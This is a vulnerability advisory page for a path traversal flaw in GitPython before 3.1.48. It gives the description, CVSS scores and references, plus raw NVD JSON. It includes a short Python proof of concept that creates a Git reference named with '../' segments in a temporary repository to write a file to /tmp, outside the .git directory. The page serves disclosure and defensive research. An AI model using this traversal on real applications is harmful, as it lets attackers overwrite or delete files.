CVE-2026-44243

Description

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository’s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gitpython_project:gitpython:*:*:*:*:*:python:*:* - VULNERABLE

GitPython < 3.1.48

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import git
import os
import tempfile

# Initialize a test repository
repo_path = tempfile.mkdtemp()
repo = git.Repo.init(repo_path)

# Create a dummy file and commit to have a valid target SHA
with open(os.path.join(repo_path, 'test.txt'), 'w') as f:
    f.write('content')
repo.index.add(['test.txt'])
commit_sha = repo.index.commit('Initial commit').hexsha

# Define a malicious reference path using path traversal
# Attempting to write outside the .git directory (e.g., /tmp/pwned)
malicious_ref = 'refs/heads/../../../tmp/pwned'

try:
    print(f"Attempting to create reference: {malicious_ref}")
    # In vulnerable versions (< 3.1.48), this creates a file at /tmp/pwned
    repo.create_reference(malicious_ref, commit_sha)
    print("[+] PoC successful: File written outside .git directory.")
except Exception as e:
    print(f"[-] PoC failed (System might be patched): {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44243
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44243
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44243/
[4] VulDB https://vuldb.com/cve/CVE-2026-44243
[5] https://github.com/gitpython-developers/GitPython/releases/tag/3.1.48
[6] https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24
[7] https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44243", "sourceIdentifier": "[email protected]", "published": "2026-05-07T19:16:02.227", "lastModified": "2026-05-07T21:12:00.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository’s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitpython_project:gitpython:*:*:*:*:*:python:*:*", "versionEndExcluding": "3.1.48", "matchCriteriaId": "9A98BC56-69A1-49DD-A1F8-7C4F981DDE66"}]}]}], "references": [{"url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.48", "source": "[email protected]", "tags": ["Patch", "Release Notes"]}, {"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}